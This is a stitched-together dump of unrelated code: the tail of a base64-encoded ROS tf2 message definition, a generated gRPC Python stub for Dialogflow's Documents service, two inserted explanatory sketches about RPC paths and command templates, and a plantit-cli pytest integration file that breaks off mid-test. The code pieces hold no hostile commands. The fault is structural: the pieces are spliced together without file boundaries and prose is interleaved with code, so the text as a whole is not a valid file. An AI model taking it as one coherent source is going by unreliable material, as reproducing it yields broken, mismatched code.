AgICAgZmxvYXQ2NCB4CiAgICAgICAgZmxvYXQ2NCB5CiAgICAgICAgZmxvYXQ2NCB6CiAgICAgICAgZmxvYXQ2NCB3CiAgdGYyX21zZ3MvVEYyRXJyb3IgZXJyb3IKICAgIHVpbnQ4IE5PX0VSUk9SPTAKICAgIHVpbnQ4IExPT0tVUF9FUlJPUj0xCiAgICB1aW50OCBDT05ORUNUSVZJVFlfRVJST1I9MgogICAgdWludDggRVhUUkFQT0xBVElPTl9FUlJPUj0zCiAgICB1aW50OCBJTlZBTElEX0FSR1VNRU5UX0VSUk9SPTQKICAgIHVpbnQ4IFRJTUVPVVRfRVJST1I9NQogICAgdWludDggVFJBTlNGT1JNX0VSUk9SPTYKICAgIHVpbnQ4IGVycm9yCiAgICBzdHJpbmcgZXJyb3Jfc3RyaW5nCgo="
    __md5_sum__ = "ac26ce75a41384fa8bb4dc10f491ab90"

    header: Header
    status: GoalStatus
    result: LookupTransformResult

# ============================================================================
# dialogflow_v2beta1/proto/document_pb2_grpc.py
# From: gertventer1970/dialogflow-python-client-v2 (Apache-2.0 license)
# ============================================================================

# Generated by the gRPC Python protocol compiler plugin. DO NOT EDIT!
"""Client and server classes corresponding to protobuf-defined services."""
import grpc
from dialogflow_v2beta1.proto import (
document_pb2 as google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2,
)
from google.longrunning import (
operations_pb2 as google_dot_longrunning_dot_operations__pb2,
)


class DocumentsStub(object):
    """Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
    """

    def __init__(self, channel):
        """Constructor.

        Args:
            channel: A grpc.Channel.
        """
        self.ListDocuments = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/ListDocuments",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.FromString,
        )
        self.GetDocument = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/GetDocument",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.SerializeToString,
            response_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.FromString,
        )
        self.CreateDocument = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/CreateDocument",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.DeleteDocument = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/DeleteDocument",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.UpdateDocument = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/UpdateDocument",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )
        self.ReloadDocument = channel.unary_unary(
            "/google.cloud.dialogflow.v2beta1.Documents/ReloadDocument",
            request_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.SerializeToString,
            response_deserializer=google_dot_longrunning_dot_operations__pb2.Operation.FromString,
        )


class DocumentsServicer(object):
    """Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
    """

    def ListDocuments(self, request, context):
        """Returns the list of all documents of the knowledge base.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def GetDocument(self, request, context):
        """Retrieves the specified document.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def CreateDocument(self, request, context):
        """Creates a new document.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def DeleteDocument(self, request, context):
        """Deletes the specified document.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def UpdateDocument(self, request, context):
        """Updates the specified document.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")

    def ReloadDocument(self, request, context):
        """Reloads the specified document from its specified source, content_uri or
        content. The previously loaded content of the document will be deleted.

        Note: Even when the content of the document has not changed, there still
        may be side effects because of internal implementation changes.

        Note: The `projects.agent.knowledgeBases.documents` resource is deprecated;
        only use `projects.knowledgeBases.documents`.
        """
        context.set_code(grpc.StatusCode.UNIMPLEMENTED)
        context.set_details("Method not implemented!")
        raise NotImplementedError("Method not implemented!")
def add_DocumentsServicer_to_server(servicer, server):
    rpc_method_handlers = {
        "ListDocuments": grpc.unary_unary_rpc_method_handler(
            servicer.ListDocuments,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.FromString,
            response_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.SerializeToString,
        ),
        "GetDocument": grpc.unary_unary_rpc_method_handler(
            servicer.GetDocument,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.FromString,
            response_serializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.SerializeToString,
        ),
        "CreateDocument": grpc.unary_unary_rpc_method_handler(
            servicer.CreateDocument,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        "DeleteDocument": grpc.unary_unary_rpc_method_handler(
            servicer.DeleteDocument,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        "UpdateDocument": grpc.unary_unary_rpc_method_handler(
            servicer.UpdateDocument,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
        "ReloadDocument": grpc.unary_unary_rpc_method_handler(
            servicer.ReloadDocument,
            request_deserializer=google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.FromString,
            response_serializer=google_dot_longrunning_dot_operations__pb2.Operation.SerializeToString,
        ),
    }
    generic_handler = grpc.method_handlers_generic_handler(
        "google.cloud.dialogflow.v2beta1.Documents", rpc_method_handlers
    )
    server.add_generic_rpc_handlers((generic_handler,))
# This class is part of an EXPERIMENTAL API.
class Documents(object):
    """Service for managing knowledge [Documents][google.cloud.dialogflow.v2beta1.Document].
    """

    @staticmethod
    def ListDocuments(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/ListDocuments",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsRequest.SerializeToString,
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ListDocumentsResponse.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )

    @staticmethod
    def GetDocument(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/GetDocument",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.GetDocumentRequest.SerializeToString,
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.Document.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )

    @staticmethod
    def CreateDocument(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/CreateDocument",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.CreateDocumentRequest.SerializeToString,
            google_dot_longrunning_dot_operations__pb2.Operation.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )

    @staticmethod
    def DeleteDocument(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/DeleteDocument",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.DeleteDocumentRequest.SerializeToString,
            google_dot_longrunning_dot_operations__pb2.Operation.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )

    @staticmethod
    def UpdateDocument(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/UpdateDocument",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.UpdateDocumentRequest.SerializeToString,
            google_dot_longrunning_dot_operations__pb2.Operation.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )

    @staticmethod
    def ReloadDocument(
        request,
        target,
        options=(),
        channel_credentials=None,
        call_credentials=None,
        compression=None,
        wait_for_ready=None,
        timeout=None,
        metadata=None,
    ):
        return grpc.experimental.unary_unary(
            request,
            target,
            "/google.cloud.dialogflow.v2beta1.Documents/ReloadDocument",
            google_dot_cloud_dot_dialogflow__v2beta1_dot_proto_dot_document__pb2.ReloadDocumentRequest.SerializeToString,
            google_dot_longrunning_dot_operations__pb2.Operation.FromString,
            options,
            channel_credentials,
            call_credentials,
            compression,
            wait_for_ready,
            timeout,
            metadata,
        )
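A brief sketch (not part of the generated module) of why the experimental stubs above hard-code strings like "/google.cloud.dialogflow.v2beta1.Documents/ListDocuments": gRPC's generic handler registered by add_DocumentsServicer_to_server routes each call by its fully-qualified path, "/<package>.<Service>/<Method>". The helper below is illustrative only.

```python
# Illustrative sketch: how gRPC builds the routing path that both the
# generic handler and the experimental stubs agree on.
SERVICE_NAME = "google.cloud.dialogflow.v2beta1.Documents"


def method_path(service, method):
    """Build the fully-qualified RPC path gRPC uses for request routing."""
    return "/{}/{}".format(service, method)


path = method_path(SERVICE_NAME, "ListDocuments")
```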
import tempfile
from os import remove, environ
from os.path import join
import pytest
from plantit_cli import commands
from plantit_cli.store import terrain_commands
from plantit_cli.tests.integration.terrain_test_utils import create_collection, upload_file, delete_collection
from plantit_cli.tests.utils import clear_dir, check_hello, Token
message = "Message"
testdir = '/opt/plantit-cli/runs'
tempdir = tempfile.gettempdir()
token = '' # Token.get()
DEFAULT_SLEEP = 45
@pytest.mark.skip(reason='debug')
def test_pull_then_run_file_input(remote_base_path, file_name_1):
    local_path = join(testdir, file_name_1)
    remote_path = join(remote_base_path, "testCollection")
    options = {
        'workdir': testdir,
        'image': "docker://alpine:latest",
        'command': 'cat "$INPUT" > "$INPUT.output"',
        'input': {'path': join(testdir, file_name_1), 'kind': 'file'}
    }

    try:
        # prep CyVerse collection
        create_collection(remote_path, token)

        # prep file
        with open(local_path, "w") as file1:
            file1.write('Hello, 1!')
        upload_file(local_path, remote_path, token)
        remove(local_path)

        # pull file to test directory
        terrain_commands.pull(remote_path, testdir, cyverse_token=token)

        # check file was pulled
        downloaded_path = join(testdir, file_name_1)
        check_hello(downloaded_path, 1)
        remove(downloaded_path)

        # expect 1 container
        commands.run(
            options=options,
            docker_username=environ.get('DOCKER_USERNAME', None),
            docker_password=environ.get('DOCKER_PASSWORD', None))

        # check local output file was written
        output_1 = f"{downloaded_path}.output"
        check_hello(output_1, 1)
        remove(output_1)
    finally:
        clear_dir(testdir)
        delete_collection(remote_path, token)
@pytest.mark.skip(reason='debug')
def test_pull_then_run_file_input_and_parameters(remote_base_path, file_name_1):
    local_path = join(testdir, file_name_1)
    remote_path = join(remote_base_path, "testCollection")
    options = {
        'workdir': testdir,
        'image': "docker://alpine:latest",
        'command': 'cat $INPUT > $INPUT.$TAG.output',
        'input': {'path': local_path, 'kind': 'file'},
        'parameters': [{'key': 'TAG', 'value': message}]
    }

    try:
        # prep CyVerse collection
        create_collection(remote_path, token)

        # prep file
        with open(local_path, "w") as file1:
            file1.write('Hello, 1!')
        upload_file(local_path, remote_path, token)
        remove(local_path)

        # pull file to test directory
        terrain_commands.pull(remote_path, testdir, cyverse_token=token)

        # check file was pulled
        check_hello(local_path, 1)
        remove(local_path)

        # expect 1 container
        commands.run(
            options=options,
            docker_username=environ.get('DOCKER_USERNAME', None),
            docker_password=environ.get('DOCKER_PASSWORD', None))

        # check local output file was written
        output_1 = f"{local_path}.{message}.output"
        check_hello(output_1, 1)
        remove(output_1)
    finally:
        clear_dir(testdir)
        delete_collection(remote_path, token)
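A minimal sketch (an assumption, not plantit-cli's actual implementation) of how a command template like 'cat $INPUT > $INPUT.$TAG.output' could be expanded from the options used in the tests above, with $INPUT bound to the pulled file and $TAG taken from the 'parameters' list. plantit-cli's real substitution logic may differ.

```python
# Hypothetical expansion of a plantit-cli command template: each $KEY
# placeholder is replaced by its bound value before the container runs.
def expand_command(template, params):
    """Naively substitute $KEY placeholders; order-sensitive on prefix clashes."""
    for key, value in params.items():
        template = template.replace("$" + key, str(value))
    return template


cmd = expand_command(
    "cat $INPUT > $INPUT.$TAG.output",
    {"INPUT": "/opt/plantit-cli/runs/f1.txt", "TAG": "Message"},
)
```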
# def test_run_fails_with_no_params_and_file_input_and_no_output_when_no_inputs_found(remote_base_path, file_name_1):
# time.sleep(DEFAULT_SLEEP)
# plan = RunOptions(
# identifier='test_run_fails_with_no_params_and_file_input_and_no_output_when_no_inputs_found',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat "$INPUT" | tee "$INPUT.output"',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# cyverse_token=token)
#
# # expect exception
# with pytest.raises(PlantitException):
# Runner(TerrainStore(plan)).run(plan)
# time.sleep(DEFAULT_SLEEP)
#
#
# def test_run_fails_with_params_and_file_input_and_no_output_when_no_inputs_found(remote_base_path,
# file_name_1):
# time.sleep(DEFAULT_SLEEP)
# plan = RunOptions(
# identifier='test_run_fails_with_params_and_file_input_and_no_output_when_no_inputs_found',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat "$INPUT" | tee "$INPUT.$TAG.output"',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
# # expect exception
# with pytest.raises(PlantitException):
# Runner(TerrainStore(plan)).run(plan)
# time.sleep(DEFAULT_SLEEP)
#
#
# def test_run_succeeds_with_no_params_and_files_input_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# check_hello(downloaded_path_1, 1)
# check_hello(downloaded_path_2, 2)
# remove(downloaded_path_1)
# remove(downloaded_path_2)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.output"
# output_2 = f"{downloaded_path_2}.output"
# check_hello(output_1, 1)
# check_hello(output_2, 2)
# remove(output_1)
# remove(output_2)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_files_input_and_patterns_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# 'patterns': [
# file_name_1
# ]
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# assert not isfile(downloaded_path_2)
# check_hello(downloaded_path_1, 1)
# remove(downloaded_path_1)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.output"
# check_hello(output_1, 1)
# remove(output_1)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_files_input_and_no_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_path_1 = join(testdir, file_name_1)
# local_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_files_input_and_no_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'files',
# 'from': join(remote_base_path, "testCollection"),
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep files
# with open(local_path_1, "w") as file1, open(local_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_path_1, remote_path, token)
# upload_file(local_path_2, remote_path, token)
#
# # expect 2 containers
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were pulled
# downloaded_path_1 = join(testdir, 'input', file_name_1)
# downloaded_path_2 = join(testdir, 'input', file_name_2)
# check_hello(downloaded_path_1, 1)
# check_hello(downloaded_path_2, 2)
# remove(downloaded_path_1)
# remove(downloaded_path_2)
#
# # check local output files were written
# output_1 = f"{downloaded_path_1}.{message}.output"
# output_2 = f"{downloaded_path_2}.{message}.output"
# check_hello(output_1, 1)
# check_hello(output_2, 2)
# remove(output_1)
# remove(output_2)
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_file_output(remote_base_path):
# local_output_path = join(testdir, 'output.txt')
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_file_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" >> $OUTPUT',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'output.txt',
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_path)
# check_hello(local_output_path, 'world')
# # os.remove(local_output_file)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, 'output.txt') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_no_input_and_file_output(remote_base_path):
# local_output_path = join(testdir, f"output.{message}.txt")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_file_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" >> $OUTPUT',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': f"output.{message}.txt",
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_path)
# check_hello(local_output_path, 'world')
# # os.remove(local_output_file)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"output.{message}.txt") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_no_input_and_directory_output(remote_base_path):
# local_output_path = testdir
# local_output_file_1 = join(local_output_path, 't1.txt')
# local_output_file_2 = join(local_output_path, 't2.txt')
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_no_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" | tee $OUTPUT/t1.txt $OUTPUT/t2.txt',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_1)
# assert isfile(local_output_file_2)
# check_hello(local_output_file_1, 'world')
# check_hello(local_output_file_2, 'world')
# remove(local_output_file_1)
# remove(local_output_file_2)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, 't1.txt') in [file['path'] for file in files]
# assert join(remote_path, 't2.txt') in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# @pytest.mark.skip(reason="fails on GitHub Actions build (why?)")
# def test_run_succeeds_with_params_and_no_input_and_directory_output(remote_base_path):
# local_output_path = testdir
# local_output_file_1 = join(local_output_path, f"t1.{message}.txt")
# local_output_file_2 = join(local_output_path, f"t2.{message}.txt")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_no_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='echo "Hello, world!" | tee $OUTPUT/t1.$TAG.txt $OUTPUT/t2.$TAG.txt',
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': '',
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # run
# Runner(TerrainStore(plan)).run(plan)
#
# # check files were written locally
# assert isfile(local_output_file_1)
# assert isfile(local_output_file_2)
# check_hello(local_output_file_1, 'world')
# check_hello(local_output_file_2, 'world')
# remove(local_output_file_1)
# remove(local_output_file_2)
#
# # check files were pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"t1.{message}.txt") in [file['path'] for file in files]
# assert join(remote_path, f"t2.{message}.txt") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_file_input_and_directory_output(
# remote_base_path,
# file_name_1):
# local_input_file_path = join(testdir, file_name_1)
# local_output_path = join(testdir, 'input') # write output files to input dir
# local_output_file_path = join(local_output_path, f"{file_name_1}.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_file_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.output',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'input', # write output files to input dir
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path, "w") as file1:
# file1.write('Hello, 1!')
# upload_file(local_input_file_path, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_file_path)
# check_hello(local_output_file_path, '1')
# remove(local_output_file_path)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"{file_name_1}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_file_input_and_directory_output(
# remote_base_path,
# file_name_1):
# local_input_file_path = join(testdir, file_name_1)
# local_output_path = join(testdir, 'input') # write output files to input dir
# local_output_file_path = join(local_output_path, f"{file_name_1}.{message}.output")
# remote_path = join(remote_base_path, "testCollection")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_file_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='cat $INPUT | tee $INPUT.$TAG.output',
# input={
# 'kind': 'file',
# 'from': join(remote_base_path, "testCollection", file_name_1),
# },
# output={
# 'to': join(remote_base_path, "testCollection"),
# 'from': 'input', # write output files to input dir
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token,
# parameters=[
# {
# 'key': 'TAG',
# 'value': message
# },
# ])
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path, "w") as file1:
# file1.write('Hello, 1!')
# upload_file(local_input_file_path, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_file_path)
# check_hello(local_output_file_path, '1')
# remove(local_output_file_path)
#
# # check file was pushed to CyVerse
# files = list_files(remote_path, token)
# assert join(remote_path, f"{file_name_1}.{message}.output") in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_no_params_and_directory_input_and_directory_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_input_file_path_1 = join(testdir, file_name_1)
# local_input_file_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# local_output_dir = join(testdir, 'input') # write output files to input dir
# local_output_path = join(local_output_dir, f"{join(testdir, 'input')}.output")
# plan = RunOptions(
# identifier='test_run_succeeds_with_no_params_and_directory_input_and_directory_output',
# workdir=testdir,
# image="docker://alpine:latest",
# command='ls $INPUT | tee $INPUT.output',
# input={
# 'kind': 'directory',
# 'from': remote_path,
# },
# output={
# 'to': remote_path,
# 'from': '',
# 'include': {'patterns': ['output'], 'names': []}
# },
# cyverse_token=token)
#
# try:
# # prep CyVerse collection
# create_collection(remote_path, token)
#
# # prep file
# with open(local_input_file_path_1, "w") as file1, open(local_input_file_path_2, "w") as file2:
# file1.write('Hello, 1!')
# file2.write('Hello, 2!')
# upload_file(local_input_file_path_1, remote_path, token)
# upload_file(local_input_file_path_2, remote_path, token)
#
# # expect 1 container
# Runner(TerrainStore(plan)).run(plan)
#
# # check file was written locally
# assert isfile(local_output_path)
# with open(local_output_path) as file:
# lines = file.readlines()
# assert len(lines) == 2
# assert local_input_file_path_1.split('/')[-1] in lines[0]
# assert local_input_file_path_2.split('/')[-1] in lines[1]
# remove(local_output_path)
#
# # check file was pushed to store
# files = list_files(remote_path, token)
# assert join(remote_path, local_output_path.split('/')[-1]) in [file['path'] for file in files]
# finally:
# clear_dir(testdir)
# delete_collection(remote_path, token)
#
#
# def test_run_succeeds_with_params_and_directory_input_and_directory_output(
# remote_base_path,
# file_name_1,
# file_name_2):
# local_input_file_path_1 = join(testdir, file_name_1)
# local_input_file_path_2 = join(testdir, file_name_2)
# remote_path = join(remote_base_path, "testCollection")
# local_output_dir = join(testdir, 'input') # write output files to input dir
# local_output_path = join(local_output_dir, f"{join(testdir, 'input')}.{message}.output")
# plan = RunOptions(
# identifier='test_run_succeeds_with_params_and_directory_input_and_directory_output',
# workdir=testdir,
